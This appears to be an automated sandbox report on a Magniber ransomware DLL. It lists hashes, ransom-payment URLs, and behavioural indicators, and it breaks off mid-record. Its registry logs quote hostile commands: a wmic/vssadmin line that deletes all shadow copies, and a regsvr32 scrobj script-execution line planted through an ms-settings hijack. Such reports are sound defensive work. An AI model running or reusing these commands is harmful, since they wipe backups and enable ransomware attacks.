Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
16-07-2024 17:46
Static task
static1
Behavioral task
behavioral1
Sample
4f66a5b1bb80abbe07697409267d28f5_JaffaCakes118.dll
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
4f66a5b1bb80abbe07697409267d28f5_JaffaCakes118.dll
Resource
win10v2004-20240709-en
General
-
Target
4f66a5b1bb80abbe07697409267d28f5_JaffaCakes118.dll
-
Size
38KB
-
MD5
4f66a5b1bb80abbe07697409267d28f5
-
SHA1
c9e4bf287498a31f75660c9935b80c6eb4082fc8
-
SHA256
10e1b47731018be0b25fb40a32f85ac586f5cbe3fb57450818ddec6bafa7d618
-
SHA512
5eedcca7ee841997de04204a2becf00301d54e9970d4e28a4ef4aa0156f00af85eeb0a31e974238644d24c33c042bfa040451a9d0dcb97750c632e9c9cd306b8
-
SSDEEP
768:WgXItQkVssHyWby4FHCStRCGm45ah7soezD3v7h+SHU0GntxVbFe6Eg:WgXP+vniOgGmyaa35Hsxat
Malware Config
Extracted
C:\Users\Admin\Pictures\readme.txt
magniber
http://10ac06e00ef8ba30f6aitmptmni.pmaev7tzx2wapvo7wgqoaljngomjzzs3d4t53jctdq5cs5imrzjhcgid.onion/aitmptmni
http://10ac06e00ef8ba30f6aitmptmni.uscatch.club/aitmptmni
http://10ac06e00ef8ba30f6aitmptmni.roomsum.xyz/aitmptmni
http://10ac06e00ef8ba30f6aitmptmni.flyput.site/aitmptmni
http://10ac06e00ef8ba30f6aitmptmni.knewago.quest/aitmptmni
Signatures
-
Detect magniber ransomware 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4040-3-0x000001884A400000-0x000001884A73A000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 50 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exevssadmin.exevssadmin.exevssadmin.exevssadmin.execmd.execmd.exevssadmin.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.execmd.execmd.exevssadmin.exevssadmin.execmd.exevssadmin.execmd.exevssadmin.exevssadmin.execmd.exevssadmin.execmd.exevssadmin.exevssadmin.exevssadmin.execmd.exevssadmin.execmd.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.execmd.execmd.exevssadmin.exevssadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1808 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1848 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3612 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4508 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1196 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3148 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4616 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3692 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3796 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4784 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1656 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4328 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 308 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1768 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3940 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1524 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2268 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5068 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1636 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1824 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1524 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3612 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2680 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3484 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3288 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 320 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3484 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2100 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4956 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4240 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2268 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4840 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5148 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5172 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5260 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5344 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5756 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5812 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5836 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6016 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4708 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5416 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5380 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5752 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5696 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5804 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5780 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6016 4144 cmd.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1524 4144 vssadmin.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3916 4144 vssadmin.exe 98 -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (56) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 2 IoCs
Processes:
flow pid Process 36 4204 38 4204 -
Suspicious use of SetThreadContext 14 IoCs
Processes:
rundll32.exedescription pid Process procid_target PID 4040 set thread context of 2648 4040 rundll32.exe 44 PID 4040 set thread context of 2664 4040 rundll32.exe 45 PID 4040 set thread context of 2796 4040 rundll32.exe 47 PID 4040 set thread context of 3516 4040 rundll32.exe 56 PID 4040 set thread context of 3656 4040 rundll32.exe 57 PID 4040 set thread context of 3840 4040 rundll32.exe 58 PID 4040 set thread context of 3932 4040 rundll32.exe 59 PID 4040 set thread context of 4000 4040 rundll32.exe 60 PID 4040 set thread context of 4080 4040 rundll32.exe 61 PID 4040 set thread context of 3976 4040 rundll32.exe 62 PID 4040 set thread context of 2028 4040 rundll32.exe 74 PID 4040 set thread context of 3924 4040 rundll32.exe 76 PID 4040 set thread context of 1860 4040 rundll32.exe 80 PID 4040 set thread context of 1792 4040 rundll32.exe 81 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
backgroundTaskHost.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString backgroundTaskHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz backgroundTaskHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier backgroundTaskHost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 backgroundTaskHost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 3 TTPs 30 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid Process 4328 vssadmin.exe 308 vssadmin.exe 5148 vssadmin.exe 5836 vssadmin.exe 4240 vssadmin.exe 5812 vssadmin.exe 1824 vssadmin.exe 5756 vssadmin.exe 4708 vssadmin.exe 5804 vssadmin.exe 3612 vssadmin.exe 3288 vssadmin.exe 1524 vssadmin.exe 3148 vssadmin.exe 1524 vssadmin.exe 3916 vssadmin.exe 1636 vssadmin.exe 3612 vssadmin.exe 4956 vssadmin.exe 5752 vssadmin.exe 5696 vssadmin.exe 4508 vssadmin.exe 1196 vssadmin.exe 3796 vssadmin.exe 1768 vssadmin.exe 3940 vssadmin.exe 3484 vssadmin.exe 3484 vssadmin.exe 2268 vssadmin.exe 6016 vssadmin.exe -
Processes:
Explorer.EXEdescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE -
Modifies registry class 54 IoCs
Processes:
svchost.exeDllHost.exerundll32.exeRuntimeBroker.exeRuntimeBroker.exesvchost.exeTextInputHost.exesihost.exebackgroundTaskHost.exeExplorer.EXERuntimeBroker.exetaskhostw.exeStartMenuExperienceHost.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" DllHost.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" svchost.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command TextInputHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" DllHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" backgroundTaskHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" backgroundTaskHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command DllHost.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix backgroundTaskHost.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\MuiCache backgroundTaskHost.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" DllHost.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" sihost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command svchost.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open sihost.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command StartMenuExperienceHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" Explorer.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid Process 1164 notepad.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
rundll32.exemsedge.exemsedge.exeidentity_helper.exemsedge.exepid Process 4040 rundll32.exe 4040 rundll32.exe 3444 msedge.exe 3444 msedge.exe 2956 msedge.exe 2956 msedge.exe 4720 identity_helper.exe 4720 identity_helper.exe 4896 msedge.exe 4896 msedge.exe 4896 msedge.exe 4896 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Explorer.EXEtaskhostw.exepid Process 3516 Explorer.EXE 2796 taskhostw.exe -
Suspicious behavior: MapViewOfSection 14 IoCs
Processes:
rundll32.exepid Process 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe 4040 rundll32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
Processes:
msedge.exepid Process 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXEwmic.exeWMIC.exedescription pid Process Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeIncreaseQuotaPrivilege 2288 wmic.exe Token: SeSecurityPrivilege 2288 wmic.exe Token: SeTakeOwnershipPrivilege 2288 wmic.exe Token: SeLoadDriverPrivilege 2288 wmic.exe Token: SeSystemProfilePrivilege 2288 wmic.exe Token: SeSystemtimePrivilege 2288 wmic.exe Token: SeProfSingleProcessPrivilege 2288 wmic.exe Token: SeIncBasePriorityPrivilege 2288 wmic.exe Token: SeCreatePagefilePrivilege 2288 wmic.exe Token: SeBackupPrivilege 2288 wmic.exe Token: SeRestorePrivilege 2288 wmic.exe Token: SeShutdownPrivilege 2288 wmic.exe Token: SeDebugPrivilege 2288 wmic.exe Token: SeSystemEnvironmentPrivilege 2288 wmic.exe Token: SeRemoteShutdownPrivilege 2288 wmic.exe Token: SeUndockPrivilege 2288 wmic.exe Token: SeManageVolumePrivilege 2288 wmic.exe Token: 33 2288 wmic.exe Token: 34 2288 wmic.exe Token: 35 2288 wmic.exe Token: 36 2288 wmic.exe Token: SeIncreaseQuotaPrivilege 2356 WMIC.exe Token: SeSecurityPrivilege 2356 WMIC.exe Token: SeTakeOwnershipPrivilege 2356 WMIC.exe Token: SeLoadDriverPrivilege 2356 WMIC.exe Token: SeSystemProfilePrivilege 2356 WMIC.exe Token: SeSystemtimePrivilege 2356 WMIC.exe Token: SeProfSingleProcessPrivilege 2356 WMIC.exe Token: SeIncBasePriorityPrivilege 2356 WMIC.exe Token: SeCreatePagefilePrivilege 2356 WMIC.exe Token: SeBackupPrivilege 2356 WMIC.exe Token: SeRestorePrivilege 2356 WMIC.exe Token: SeShutdownPrivilege 2356 WMIC.exe Token: SeDebugPrivilege 2356 WMIC.exe Token: SeSystemEnvironmentPrivilege 2356 WMIC.exe Token: SeRemoteShutdownPrivilege 2356 WMIC.exe Token: SeUndockPrivilege 2356 WMIC.exe Token: SeManageVolumePrivilege 2356 WMIC.exe Token: 33 2356 WMIC.exe Token: 34 2356 WMIC.exe Token: 35 2356 WMIC.exe Token: 36 2356 WMIC.exe Token: SeIncreaseQuotaPrivilege 2288 wmic.exe Token: SeSecurityPrivilege 2288 wmic.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid Process 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid Process 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe 2956 msedge.exe -
Suspicious use of UnmapMainImage 5 IoCs
Processes:
Explorer.EXERuntimeBroker.exeRuntimeBroker.exeStartMenuExperienceHost.exeRuntimeBroker.exepid Process 3516 Explorer.EXE 3976 RuntimeBroker.exe 3924 RuntimeBroker.exe 3932 StartMenuExperienceHost.exe 4000 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
sihost.execmd.execmd.execmd.execmd.execmd.exemsedge.exeComputerDefaults.exeComputerDefaults.exedescription pid Process procid_target PID 2648 wrote to memory of 1164 2648 sihost.exe 86 PID 2648 wrote to memory of 1164 2648 sihost.exe 86 PID 2648 wrote to memory of 3824 2648 sihost.exe 87 PID 2648 wrote to memory of 3824 2648 sihost.exe 87 PID 2648 wrote to memory of 2288 2648 sihost.exe 88 PID 2648 wrote to memory of 2288 2648 sihost.exe 88 PID 2648 wrote to memory of 2156 2648 sihost.exe 89 PID 2648 wrote to memory of 2156 2648 sihost.exe 89 PID 2648 wrote to memory of 1964 2648 sihost.exe 90 PID 2648 wrote to memory of 1964 2648 sihost.exe 90 PID 2156 wrote to memory of 2356 2156 cmd.exe 95 PID 2156 wrote to memory of 2356 2156 cmd.exe 95 PID 1964 wrote to memory of 5112 1964 cmd.exe 97 PID 1964 wrote to memory of 5112 1964 cmd.exe 97 PID 1848 wrote to memory of 4840 1848 cmd.exe 131 PID 1848 wrote to memory of 4840 1848 cmd.exe 131 PID 1808 wrote to memory of 616 1808 cmd.exe 107 PID 1808 wrote to memory of 616 1808 cmd.exe 107 PID 3824 wrote to memory of 2956 3824 cmd.exe 108 PID 3824 wrote to memory of 2956 3824 cmd.exe 108 PID 2956 wrote to memory of 4540 2956 msedge.exe 111 PID 2956 wrote to memory of 4540 2956 msedge.exe 111 PID 4840 wrote to 